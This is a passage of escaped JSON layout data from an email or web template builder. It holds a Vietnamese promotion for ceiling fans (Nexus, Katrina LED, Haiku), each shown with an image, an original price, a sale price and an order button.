H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"9GAi5wAFJk\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"UQ82n-sdLO\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Xubqp58wuc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766160579-nexus-wh.jpg\\\",\\\"width\\\":360,\\\"height\\\":240,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"DTDUZT5wAg\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YCqOrNUvWj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>NEXUS WH\\/BL 60\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"B9Jq0s6_xN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">7.9 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">6.3 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"BDg2R7p2Jw\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_11\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_30\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"b_icNQD3au\\\",\\\"contents\\\":[{\\\"id\\\":\\\"OYQTIWRx_V\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678766391705-KATRINA.jpg\\\",\\\"width\\\":360,\\\"height\\\":240},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_13\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"iOxGCwHnL9\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"BqLxS58gL7\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>KATRINA LED 52\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"6gLqBsNTdj\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">6.5 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup><span style=\\\\\\\"line-height: 12px;\\\\\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">5.2 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"vjc-iDHt2-\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_12\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_31\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_22\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"D9WFj6utYl\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"W5X7-Y1bCd\\\",\\\"contents\\\":[{\\\"id\\\":\\\"qvrza6rMrd\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768098980-L-44-wh.jpg\\\",\\\"width\\\":360,\\\"height\\\":240,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_15\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"3ig6Uhzh9N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_15\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"EUKoF0D2_s\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_16\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>HAIKU WH\\/BL 44\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"wb2kmgb7-n\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_17\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">18.5 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 \\u00a0<strong><span style=\\\\\\\"font-size: 28px; line-height: 33.6px; color: #db1908;\\\\\\\">15.8 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"W7bv0iVLVR\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l-cao-cap-44inch-mau-trang.html\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#1b2a2f\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 25px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"5px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_13\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110\\u1eb6T H\\u00c0NG\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":47}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_33\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"BH2N6Qgeka\\\",\\\"contents\\\":[{\\\"id\\\":\\\"m8THhQ4u4L\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768333052-HAIKU-I-S.jpg\\\",\\\"width\\\":360,\\\"height\\\":240},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_16\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"pending\\\":false,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"wFNlCgf6SA\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_18\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>HAIKU I SERIES<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"T0Wi7WLJ19\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#111416\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_19\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px;\\\\\\\"><strong>HAIKU WH\\/BL 60\\\\\\\"<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"84LxsaDyDU\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_20\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\\\\\"><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">36.9 <span style=\\\\\\\"font-size: 12px; line-height: 14.4px;\\\\\\\"><sup><span style=\\\\\\\"line-height: 12px;\\\\\\\">Tri\\u1ec7u VN\\u0110<\\/span><\\/sup><\\/span><\\/span><\\/span><\\/strong><span style=\\\\\\\"line-height: 21.6px; font-size: 18px;\\\\\\\">\\u00a0 \\u00a0 \\u00a0 